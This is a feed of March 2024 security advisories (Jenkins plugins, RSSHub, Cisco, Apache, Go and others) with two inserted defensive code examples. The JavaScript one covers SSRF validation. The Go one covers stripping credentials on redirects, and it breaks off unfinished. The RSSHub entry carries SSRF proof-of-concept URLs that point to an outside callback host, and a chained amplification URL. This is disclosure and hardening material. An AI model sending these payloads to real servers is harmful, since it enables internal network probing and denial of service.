06.03.2024 22:15:46maven[MAVEN:GHSA-PFH3-J79R-VQRJ] Jenkins Delphix Plugin has improper SSL/TLS certificate validation (moderate)In Jenkins Delphix Plugin 3.0.1 through 3.1.0 (both inclusive) a global option for administrators to enable or disable SSL/TLS certificate validation for Data Control Tower (DCT) connections fails to take effect until Jenkins is restarted when switching from disabled validation to enabled validation.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PFH3-J79R-VQRJ
06.03.2024 22:14:36maven[MAVEN:GHSA-XJ36-6XC6-8P9X] Jenkins Delphix Plugin has SSL/TLS certificate validation disabled by default (moderate)In Jenkins Delphix Plugin 3.0.1, a global option for administrators to enable or disable SSL/TLS certificate validation for Data Control Tower (DCT) connections is disabled by default.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XJ36-6XC6-8P9X
06.03.2024 22:13:57maven[MAVEN:GHSA-2PC2-H97H-2MMW] Jenkins iceScrum Plugin vulnerable to stored Cross-site Scripting (high)Jenkins iceScrum Plugin 1.1.6 and earlier does not sanitize iceScrum project URLs on build views, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure jobs.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2PC2-H97H-2MMW
06.03.2024 21:37:27maven[MAVEN:GHSA-MR9J-QQJH-67F2] Jenkins Subversion Partial Release Manager Plugin missing permission check (moderate)A missing permission check in Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier allows attackers with Item/Read permission to trigger a build.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-MR9J-QQJH-67F2
06.03.2024 21:36:54maven[MAVEN:GHSA-RV35-69FF-G9GV] Jenkins Subversion Partial Release Manager Plugin vulnerable to Cross-Site Request Forgery (moderate)A cross-site request forgery (CSRF) vulnerability in Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier allows attackers to trigger a build.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RV35-69FF-G9GV
06.03.2024 21:33:38maven[MAVEN:GHSA-5J74-G3C5-WQWW] Jenkins GitBucket Plugin vulnerable to stored Cross-site Scripting (high)Jenkins GitBucket Plugin 0.8 and earlier does not sanitize Gitbucket URLs on build views, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure jobs.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5J74-G3C5-WQWW
06.03.2024 21:31:41maven[MAVEN:GHSA-5J5R-6MV9-M255] Jenkins Build Monitor View Plugin vulnerable to stored Cross-site Scripting (high)Jenkins Build Monitor View Plugin 1.14-860.vd06ef2568b_3f and earlier does not escape Build Monitor View names, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure Build Monitor Views.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5J5R-6MV9-M255
06.03.2024 21:28:32maven[MAVEN:GHSA-XXV9-W5HM-328J] Jenkins AppSpider Plugin missing permission checks (moderate)Jenkins AppSpider Plugin 1.0.16 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to obtain information about available scan config names, engine group names, and client names.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XXV9-W5HM-328J
06.03.2024 21:21:35maven[MAVEN:GHSA-8FM4-R23P-V68V] Jenkins MQ Notifier Plugin exposes sensitive information in build logs (moderate)Jenkins MQ Notifier Plugin 1.4.0 and earlier logs potentially sensitive build parameters as part of debug information in build logs by default.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8FM4-R23P-V68V
06.03.2024 21:20:58maven[MAVEN:GHSA-M4RM-X2RR-357W] Jenkins Bitbucket Branch Source Plugin has incorrect trust policy behavior for pull requests (moderate)In Jenkins Bitbucket Branch Source Plugin 866.vdea_7dcd3008e and earlier, except 848.850.v6a_a_2a_234a_c81, when discovering pull requests from forks, the trust policy "Forks in the same account" allows changes to Jenkinsfiles from users without write access to the project when using Bitbucket Server.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-M4RM-X2RR-357W
06.03.2024 21:09:04maven[MAVEN:GHSA-9PP4-MX6X-XH36] Jenkins OWASP Dependency-Check Plugin has stored XSS vulnerability (high)Jenkins OWASP Dependency-Check Plugin 5.4.5 and earlier does not escape vulnerability metadata from Dependency-Check reports, resulting in a stored cross-site scripting (XSS) vulnerability.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9PP4-MX6X-XH36
06.03.2024 21:08:43maven[MAVEN:GHSA-XRRW-9J78-HPF3] Jenkins HTML Publisher Plugin Stored XSS vulnerability (high)Jenkins HTML Publisher Plugin 1.32 and earlier does not escape job names, report names, and index page titles shown as part of the report frame, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XRRW-9J78-HPF3
06.03.2024 21:07:41maven[MAVEN:GHSA-8VCG-V7G4-3VR7] Jenkins HTML Publisher Plugin does not properly sanitize input (high)Jenkins HTML Publisher Plugin 1.16 through 1.32 (both inclusive) does not properly sanitize input, allowing attackers with Item/Configure permission to implement cross-site scripting (XSS) attacks and to determine whether a path on the Jenkins controller file system exists.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8VCG-V7G4-3VR7
06.03.2024 19:03:13npm[NPM:GHSA-3P3P-CGJ7-VGW3] RSSHub vulnerable to Server-Side Request Forgery (moderate)### SummarySeveral Server-Side Request Forgery (SSRF) vulnerabilities in RSSHub allow remote attackers to use the server as a proxy to send HTTP GET requests to arbitrary targets and retrieve information in the internal network or conduct Denial-of-Service (DoS) attacks.### Details#### `/mastodon/acct/:acct/statuses/:only_media?`https://github.com/DIYgod/RSSHub/blob/5928c5db2472e101c2f5c3bafed77a2f72edd40a/lib/routes/mastodon/acct.js#L4-L7https://github.com/DIYgod/RSSHub/blob/5928c5db2472e101c2f5c3bafed77a2f72edd40a/lib/routes/mastodon/utils.js#L85-L105#### `/zjol/paper/:id?`https://github.com/DIYgod/RSSHub/blob/172f6cfd2b69ea6affdbdedf61e6dde1671f3796/lib/routes/zjol/paper.js#L7-L13#### `/m4/:id?/:category*`https://github.com/DIYgod/RSSHub/blob/172f6cfd2b69ea6affdbdedf61e6dde1671f3796/lib/routes/m4/index.js#L10-L14### PoC- https://rsshub.app/mastodon/acct/test@a6wt15r2.requestrepo.com%23/statuses- https://rsshub.app/zjol/paper/a6wt15r2.requestrepo.com%23- https://rsshub.app/m4/a6wt15r2.requestrepo.com%23/test### ImpactThe attacker can send malicious requests to an RSSHub server, to make the server send HTTP GET requests to arbitrary destinations and see partial responses. This may lead to:1. Leak the server IP address, which could be hidden behind a CDN.2. Retrieve information in the internal network. e.g. which addresses/ports are accessible, the titles and meta descriptions of HTML pages.3. DoS amplification. The attacker could request the server to download some large files, or chain several SSRF requests in a single attacker request: `https://rsshub.a.com/zjol/paper/rsshub.b.net%2Fzjol%2Fpaper%2Frsshub.a.com%252Fzjol%252Fpaper%252Frsshub.b.net%25252Fzjol%25252Fpaper%25252Frsshub.a.com%2525252Fzjol%2525252Fpaper%2525252Fexample.com%2525252523%25252523%252523%2523%23`.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3P3P-CGJ7-VGW3
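An added example (not RSSHub's code) of the splice-and-truncate pattern the PoC above exploits: a decoded path segment lands in the host position of the URL the server fetches, so a `%23` that the router decodes to `#` turns everything after the attacker's host into a URL fragment. The route template and upstream domain below are hypothetical, chosen to mirror the PoC; the hardened version validates the segment as a single DNS label and then checks the parsed target against an egress allowlist.

```javascript
// Added example, not RSSHub's code. The route template is hypothetical and mirrors
// the advisory's PoC: a path segment ends up in the host position of the fetched
// URL, so a decoded "#" cuts off everything after it.

const UPSTREAM_DOMAIN = 'paper.example.org'; // assumed upstream, hypothetical

// Routers such as Express hand the handler a decoded segment; "%23" arrives as "#".
// String splicing followed by parsing lets the attacker own the host.
function unsafeUpstreamUrl(rawSegment) {
  const id = decodeURIComponent(rawSegment);
  return new URL(`https://${id}.${UPSTREAM_DOMAIN}/`);
}

// One DNS label: letters, digits, hyphen. No dots, slashes, "#", "?", "@" or ":".
const LABEL = /^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$/i;

// Returns the absolute upstream URL, or null when the segment is rejected.
function safeUpstreamUrl(rawSegment) {
  let id;
  try {
    id = decodeURIComponent(rawSegment);
  } catch {
    return null; // malformed percent-encoding
  }
  if (!LABEL.test(id)) return null;
  const url = new URL(`https://${UPSTREAM_DOMAIN}/`);
  url.hostname = `${id}.${UPSTREAM_DOMAIN}`; // setter, not string splicing
  if (!isAllowedTarget(url)) return null;      // belt and braces on the parsed result
  return url.href;
}

// Egress policy for the outbound fetch: https only, host under the upstream domain.
// A hostname check alone does not stop a name that resolves to an internal
// address; pair it with resolver or network-level egress controls.
function isAllowedTarget(url) {
  if (url.protocol !== 'https:') return false;
  const h = url.hostname.toLowerCase();
  return h === UPSTREAM_DOMAIN || h.endsWith('.' + UPSTREAM_DOMAIN);
}

// Side-by-side view of both handlers on a benign id and on the PoC-style id.
function demo() {
  return ['daily', 'attacker.example%23'].map((seg) => ({
    segment: seg,
    unsafeHost: unsafeUpstreamUrl(seg).hostname,
    safe: safeUpstreamUrl(seg),
  }));
}

if (typeof require !== 'undefined' && require.main === module) console.table(demo());
```

Rejecting the segment up front is what matters; the post-parse `isAllowedTarget` check is there so that a future change to how the URL is assembled cannot silently reopen the hole.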
06.03.2024 19:02:34npm[NPM:GHSA-2WQW-HR4F-XRHH] RSSHub Cross-site Scripting vulnerability caused by internal media proxy (moderate)## ImpactWhen a specially crafted image is supplied to the internal media proxy, it proxies the image without handling XSS vulnerabilities, allowing for the execution of arbitrary JavaScript code.Users who access the deliberately constructed URL are affected.## PatchesThis vulnerability was fixed in commit https://github.com/DIYgod/RSSHub/commit/4d3e5d79c1c17837e931b4cd253d2013b487aa87. Please upgrade to a version that includes this commit or a later one.## WorkaroundsNo.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2WQW-HR4F-XRHH
06.03.2024 18:00:00cisco[CISCO-SA-SECURE-PRIVESC-SYXQO6DS] Cisco Secure Client for Linux with ISE Posture Module Privilege Escalation Vulnerability (high)A vulnerability in the ISE Posture (System Scan) module of Cisco Secure Client for Linux could allow an authenticated, local attacker to elevate privileges on an affected device.This vulnerability is due to the use of an uncontrolled search path element. An attacker could exploit this vulnerability by copying a malicious library file to a specific directory in the filesystem and persuading an administrator to restart a specific process. A successful exploit could allow the attacker to execute arbitrary code on an affected device with root privileges.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SECURE-PRIVESC-SYXQO6DS
06.03.2024 18:00:00cisco[CISCO-SA-SECURE-CLIENT-CRLF-W43V4G7] Cisco Secure Client Carriage Return Line Feed Injection Vulnerability (high)A vulnerability in the SAML authentication process of Cisco Secure Client could allow an unauthenticated, remote attacker to conduct a carriage return line feed (CRLF) injection attack against a user.This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link while establishing a VPN session. A successful exploit could allow the attacker to execute arbitrary script code in the browser or access sensitive, browser-based information, including a valid SAML token. The attacker could then use the token to establish a remote access VPN session with the privileges of the affected user. Individual hosts and services behind the VPN headend would still need additional credentials for successful access.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SECURE-CLIENT-CRLF-W43V4G7
06.03.2024 18:00:00cisco[CISCO-SA-SB-WAP-MULTI-85G83CRB] Cisco Small Business 100, 300, and 500 Series Wireless Access Points Command Injection and Buffer Overflow Vulnerabilities (medium)Multiple vulnerabilities in the web-based management interface of Cisco Small Business 100, 300, and 500 Series Wireless Access Points (APs) could allow an authenticated, remote attacker to perform command injection and buffer overflow attacks against an affected device. In order to exploit these vulnerabilities, the attacker must have valid administrative credentials for the device.For more information about these vulnerabilities, see the Details section of this advisory.There are no workarounds that address these vulnerabilities.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SB-WAP-MULTI-85G83CRB
06.03.2024 18:00:00cisco[CISCO-SA-DUO-WIN-BYPASS-PN42KKBM] Cisco Duo Authentication for Windows Logon and RDP Authentication Bypass Vulnerability (medium)A vulnerability in Cisco Duo Authentication for Windows Logon and RDP could allow an authenticated, physical attacker to bypass secondary authentication and access an affected Windows device.This vulnerability is due to a failure to invalidate locally created trusted sessions after a reboot of the affected device. An attacker with primary user credentials could exploit this vulnerability by attempting to authenticate to an affected device. A successful exploit could allow the attacker to access the affected device without valid permissions.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-DUO-WIN-BYPASS-PN42KKBM
06.03.2024 18:00:00cisco[CISCO-SA-DUO-INFODISC-RLCEQM6T] Cisco Duo Authentication for Windows Logon and RDP Information Disclosure Vulnerability (medium)A vulnerability in the logging component of Cisco Duo Authentication for Windows Logon and RDP could allow an authenticated, local attacker to view sensitive information in clear text on an affected system.This vulnerability is due to improper storage of an unencrypted registry key in certain logs. An attacker could exploit this vulnerability by accessing the logs on an affected system. A successful exploit could allow the attacker to view sensitive information in clear text.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-DUO-INFODISC-RLCEQM6T
06.03.2024 18:00:00cisco[CISCO-SA-APPD-XSS-3JWQSMNT] Cisco AppDynamics Controller Cross-Site Scripting Vulnerability (medium)A vulnerability in the web-based management interface of Cisco AppDynamics Controller could allow an authenticated, remote attacker to perform a reflected cross-site scripting (XSS) attack against a user of the interface of an affected device.This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user to click a malicious link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-APPD-XSS-3JWQSMNT
06.03.2024 18:00:00cisco[CISCO-SA-APPD-TRAVERSAL-M7N8MZPF] Cisco AppDynamics Controller Path Traversal Vulnerability (medium)A vulnerability in the file upload functionality of Cisco AppDynamics Controller could allow an authenticated, remote attacker to conduct directory traversal attacks on an affected device.This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to access sensitive data on an affected device.Cisco AppDynamics has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-APPD-TRAVERSAL-M7N8MZPF
06.03.2024 23:41:13maven[MAVEN:GHSA-M757-P8RV-4Q93] Apache Linkis DataSource: DataSource module Oracle SQL Database Password Logged (moderate)In Apache Linkis <=1.4.0, the password is printed to the log when using the Oracle data source of the Linkis data source module. We recommend users upgrade Linkis to version 1.5.0.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-M757-P8RV-4Q93
06.03.2024 14:51:56ubuntu[USN-6679-1] FRR vulnerabilityFRR could be made to crash if it received specially crafted network traffic.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6679-1
06.03.2024 19:05:59maven[MAVEN:GHSA-P2GX-4434-PF6G] Apache InLong Deserialization of Untrusted Data Vulnerability (high)Deserialization of Untrusted Data vulnerability in Apache InLong.This issue affects Apache InLong: from 1.8.0 through 1.10.0, the attackers can use the specific payload to read from an arbitrary file. Users are advised to upgrade to Apache InLong's 1.11.0 or cherry-pick [1] to solve it.[1] https://github.com/apache/inlong/pull/9673https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P2GX-4434-PF6G
06.03.2024 11:38:49ubuntu[USN-6676-1] c-ares vulnerability (medium)c-ares could be made to crash if it received specially crafted input.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6676-1
06.03.2024 05:13:13ubuntu[USN-6649-2] Firefox regressionsUSN-6649-1 caused some minor regressions in Firefox.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6649-2
06.03.2024 02:00:00cisa[CISA-2024:0306] CISA Adds 2 Known Exploited Vulnerabilities to CatalogCISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0306
06.03.2024 02:00:00debian[DSA-5636-1] chromium security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5636-1
06.03.2024 02:00:00jenkins[JENKINS:SECURITY-3302] Stored XSS vulnerability in `htmlpublisher` (high)`htmlpublisher` 1.32 and earlier does not escape job names, report names, and index page titles shown as part of the report frame.This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.`htmlpublisher` 1.32.1 escapes job names, report names, and index page titles when creating a new report.`htmlpublisher` 1.32.1 checks reports created in earlier releases for the presence of unsafe characters in the report frame, and refuses to show these frames if unsafe characters are identified.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3302
06.03.2024 02:00:00jenkins[JENKINS:SECURITY-3303] Path traversal vulnerability in `htmlpublisher` (medium)`htmlpublisher` 1.32 and earlier archives invalid symbolic links in report directories on agents and recreates them on the controller.Attackers with Item/Configure permission can use them to determine whether a path on the Jenkins controller file system exists, without being able to access it.`htmlpublisher` 1.32.1 does not archive symbolic links.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3303
06.03.2024 02:00:00jenkins[JENKINS:SECURITY-3344] Stored XSS vulnerability in `dependency-check-jenkins-plugin` (high)`dependency-check-jenkins-plugin` 5.4.5 and earlier does not escape vulnerability metadata from Dependency-Check reports on the Jenkins UI.This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control workspace contents or CVE metadata.`dependency-check-jenkins-plugin` 5.4.6 escapes vulnerability metadata from Dependency-Check reports.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3344
06.03.2024 02:00:00jenkins[JENKINS:SECURITY-3180] Sensitive information exposure in build logs by `mq-notifier` (medium)`mq-notifier` has a global option to log the JSON payload it sends to RabbitMQ in the build log.This includes the build parameters, some of which may be sensitive, and they are not masked.In `mq-notifier` 1.4.0 and earlier, this option is enabled by default.This results in unwanted exposure of sensitive information in build logs.`mq-notifier` 1.4.1 disables the global option to log the JSON payload it sends to RabbitMQ by default.This option is disabled when updating from a previous release and needs to be re-enabled by administrators who want to use this feature.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3180
06.03.2024 02:00:00jenkins[JENKINS:SECURITY-3144] Missing permission checks in `jenkinsci-appspider-plugin` (medium)`jenkinsci-appspider-plugin` 1.0.16 and earlier does not perform permission checks in several HTTP endpoints.This allows attackers with Overall/Read permission to obtain information about available scan config names, engine group names, and client names.`jenkinsci-appspider-plugin` 1.0.17 requires Item/Configure permission for the affected HTTP endpoints.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3144
06.03.2024 02:00:00jenkins[JENKINS:SECURITY-3215] SSL/TLS certificate validation disabled by default in `delphix` (medium)`delphix` provides a global option for administrators to enable or disable SSL/TLS certificate validation for Data Control Tower (DCT) connections.In `delphix` 3.0.1 this option is set to disable SSL/TLS certificate validation by default.In `delphix` 3.0.2 this option is set to enable SSL/TLS certificate validation by default.NOTE: `delphix` 3.0.2 inverts the semantics of the existing option.Administrators who update from version 3.0.1 to 3.0.2 will need to toggle this option to have the previously configured behavior.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3215
06.03.2024 02:00:00jenkins[JENKINS:SECURITY-3330] Improper SSL/TLS certificate validation in `delphix` (medium)`delphix` provides a global option for administrators to enable or disable SSL/TLS certificate validation for Data Control Tower (DCT) connections.In `delphix` 3.0.1 through 3.1.0 (both inclusive) an option change from disabled validation to enabled validation fails to take effect until Jenkins is restarted.`delphix` 3.1.1 applies the configuration change immediately when switching from disabled validation to enabled validation.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3330
06.03.2024 02:00:00jenkins[JENKINS:SECURITY-3200] CSRF vulnerability and missing permission check in `docker-build-step` (medium)`docker-build-step` 2.11 and earlier does not perform a permission check in an HTTP endpoint implementing a connection test.This allows attackers with Overall/Read permission to connect to an attacker-specified TCP or Unix socket URL.Additionally, the plugin reconfigures itself using the provided connection test parameters, affecting future build step executions.Additionally, this endpoint does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.As of publication of this advisory, there is no fix.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3200
06.03.2024 02:00:00jenkins[JENKINS:SECURITY-3280] Stored XSS vulnerability in `build-monitor-plugin` (high)`build-monitor-plugin` 1.14-860.vd06ef2568b_3f and earlier does not escape Build Monitor View names.This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure Build Monitor Views.As of publication of this advisory, there is no fix.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3280
06.03.2024 02:00:00jenkins[JENKINS:SECURITY-3249] Stored XSS vulnerability in `gitbucket` (high)`gitbucket` 0.8 and earlier does not sanitize Gitbucket URLs on build views.This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure jobs.As of publication of this advisory, there is no fix.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3249
06.03.2024 02:00:00jenkins[JENKINS:SECURITY-3325] CSRF vulnerability and missing permission checks in `svn-partial-release-mgr` (medium)`svn-partial-release-mgr` 1.0.1 and earlier does not perform a permission check in an HTTP endpoint.This allows attackers with Item/Read permission to trigger a build.Additionally, this endpoint does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.As of publication of this advisory, there is no fix.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3325
06.03.2024 02:00:00jenkins[JENKINS:SECURITY-3248] Stored XSS vulnerability in `icescrum` (high)`icescrum` 1.1.6 and earlier does not sanitize iceScrum project URLs on build views.This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure jobs.As of publication of this advisory, there is no fix.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3248
06.03.2024 02:00:00jenkins[JENKINS:SECURITY-3333] Terrapin SSH vulnerability in `trilead-api` (medium)`trilead-api` bundles the Jenkins project's fork of the Trilead SSH2 library (https://github.com/jenkinsci/trilead-ssh2/) for use by other plugins.`trilead-api` 2.133.vfb_8a_7b_9c5dd1 and earlier, except 2.84.86.vf9c960e9b_458, bundles versions of Jenkins/Trilead SSH2 that are susceptible to CVE-2023-48795 (https://www.cve.org/CVERecord?id=CVE-2023-48795), the Terrapin attack (https://en.wikipedia.org/wiki/Terrapin_attack).This vulnerability allows a machine-in-the-middle attacker to reduce the security of an SSH connection.`trilead-api` 2.141.v284120fd0c46 updates the bundled Jenkins/Trilead SSH2 library to version `build-217-jenkins-274.276.v58da_75159cb_7`, which by default removes the affected ciphers and encryption modes.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3333
06.03.2024 02:00:00jenkins[JENKINS:SECURITY-3301] Improper input sanitization in `htmlpublisher` (high)SECURITY-784 / CVE-2018-1000175 (https://www.jenkins.io/security/advisory/2018-04-16/#SECURITY-784) is a path traversal vulnerability in `htmlpublisher` 1.15 and earlier.The fix for it retained compatibility for older reports as a fallback.In `htmlpublisher` 1.16 through 1.32 (both inclusive) this fallback for reports created in `htmlpublisher` 1.15 and earlier does not properly sanitize input.This allows attackers with Item/Configure permission to do the following:* Implement stored cross-site scripting (XSS) attacks.* Determine whether a path on the Jenkins controller file system exists, without being able to access it.`htmlpublisher` 1.32.1 removes support for reports created before `htmlpublisher` 1.15.Those reports are retained on disk, but may no longer be accessible through the Jenkins UI.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3301
06.03.2024 02:00:00jenkins[JENKINS:SECURITY-3300] Incorrect trust policy behavior for pull requests from forks in `cloudbees-bitbucket-branch-source` (medium)Multibranch Pipelines with Bitbucket branch source can be configured to discover pull requests from forks.The trust policy is set to "Forks in the same account" by default.In `cloudbees-bitbucket-branch-source` 866.vdea_7dcd3008e and earlier, except 848.850.v6a_a_2a_234a_c81, this trust policy allows changes to Jenkinsfiles from users without write access to the project when using Bitbucket Server.This allows attackers able to submit pull requests from forks to change the Pipeline behavior.In `cloudbees-bitbucket-branch-source` 871.v28d74e8b_4226, the "Forks in the same account" trust policy does not extend trust to Jenkinsfiles modified by users without write access to the project.NOTE: Pipelines using Bitbucket Cloud are unaffected by this issue.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3300
06.03.2024 02:00:00 | oraclelinux | [ELSA-2024-1130] openssh security update (moderate)
[8.7p1-34.3]
- Fix Terrapin attack (CVE-2023-48795) Resolves: RHEL-19764
- Forbid shell metasymbols in username/hostname (CVE-2023-51385) Resolves: RHEL-19822
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1130

06.03.2024 02:00:00 | oraclelinux | [ELSA-2024-1139] keylime security update (low)
[7.3.0-13]
- Backport fix for CVE-2023-3674 Resolves: RHEL-21013
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1139

06.03.2024 02:00:00 | oraclelinux | [ELSA-2024-1142] haproxy security update (moderate)
[2.4.22-3]
- Reject '#' as part of URI path component (CVE-2023-45539, RHEL-18169)
[2.4.22-2]
- Reject any empty content-length header value (CVE-2023-40225, RHEL-7736)
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1142

06.03.2024 02:00:00 | oraclelinux | [ELSA-2024-1147] rear security update (moderate)
[2.6-21.0.1]
- rear: creates a world-readable initrd (CVE-2024-23301)
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1147

06.03.2024 01:15:07 | alpinelinux | [ALPINE:CVE-2023-45289] go vulnerability
[From CVE-2023-45289] When following an HTTP redirect to a domain which is not a subdomain match or exact match of the initial domain, an http.Client does not forward sensitive headers such as "Authorization" or "Cookie". For example, a redirect from foo.com to www.foo.com will forward the Authorization header, but a redirect to bar.com will not. A maliciously crafted HTTP redirect could cause sensitive headers to be unexpectedly forwarded.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-45289

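The forwarding rule in this entry, as an added example that is not code from the Go project or from the advisory: `shouldForwardSensitiveHeaders` implements the "same domain or subdomain" test, `newRedirectAwareClient` applies it from `http.Client.CheckRedirect` so that `Authorization` and `Cookie` are stripped before any hop to an unrelated host whatever Go version is linked in, and a loopback harness shows what actually reaches the redirect target. The host names `origin.example`, `api.origin.example` and `unrelated.example` and the bearer token are constructed; a custom dialer sends them all to one local listener so nothing touches DNS.

```go
// Added example, not code from the Go project or the advisory: the
// "same domain or subdomain" rule applied from http.Client.CheckRedirect,
// plus an offline harness that shows what a client really forwards.
// origin.example, api.origin.example and unrelated.example are constructed.
package main

import (
	"context"
	"errors"
	"fmt"
	"io"
	"net"
	"net/http"
	"net/http/httptest"
	"strings"
)

// sensitiveHeaders must not reach an unrelated host when a redirect is followed.
var sensitiveHeaders = []string{"Authorization", "Cookie", "Cookie2"}

// shouldForwardSensitiveHeaders reports whether redirectHost is initialHost
// itself or a subdomain of it: "www.foo.com" qualifies under "foo.com",
// "bar.com" and the look-alike "notfoo.com" do not. Both are bare host names.
func shouldForwardSensitiveHeaders(initialHost, redirectHost string) bool {
	initialHost, redirectHost = strings.ToLower(initialHost), strings.ToLower(redirectHost)
	if initialHost == "" || redirectHost == "" {
		return false
	}
	return redirectHost == initialHost || strings.HasSuffix(redirectHost, "."+initialHost)
}

// newRedirectAwareClient strips the sensitive headers before any hop outside
// the initial domain. net/http copies headers onto the new request before it
// calls CheckRedirect, so deleting them here affects exactly that hop.
func newRedirectAwareClient(transport http.RoundTripper, maxHops int) *http.Client {
	return &http.Client{
		Transport: transport,
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			if len(via) >= maxHops {
				return errors.New("too many redirects")
			}
			if !shouldForwardSensitiveHeaders(via[0].URL.Hostname(), req.URL.Hostname()) {
				for _, h := range sensitiveHeaders {
					req.Header.Del(h)
				}
			}
			return nil
		},
	}
}

// demoServer plays two roles on one loopback listener: origin.example
// redirects to the host named in ?to=, every other host reports whether an
// Authorization header arrived.
func demoServer() *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Host == "origin.example" {
			http.Redirect(w, r, "http://"+r.URL.Query().Get("to")+"/landing", http.StatusFound)
			return
		}
		fmt.Fprint(w, r.Header.Get("Authorization") != "")
	}))
}

// loopbackTransport dials srv for every host name, so the constructed names
// never touch DNS.
func loopbackTransport(srv *httptest.Server) http.RoundTripper {
	addr := srv.Listener.Addr().String()
	return &http.Transport{
		DialContext: func(ctx context.Context, network, _ string) (net.Conn, error) {
			return (&net.Dialer{}).DialContext(ctx, network, addr)
		},
	}
}

// credentialReachedLanding sends an authenticated request to origin.example,
// follows its redirect to `to`, and reports whether the landing host saw the
// Authorization header.
func credentialReachedLanding(srv *httptest.Server, to string) (bool, error) {
	client := newRedirectAwareClient(loopbackTransport(srv), 5)
	req, err := http.NewRequest(http.MethodGet, "http://origin.example/?to="+to, nil)
	if err != nil {
		return false, err
	}
	req.Header.Set("Authorization", "Bearer example-token") // constructed credential
	resp, err := client.Do(req)
	if err != nil {
		return false, err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	if err != nil {
		return false, err
	}
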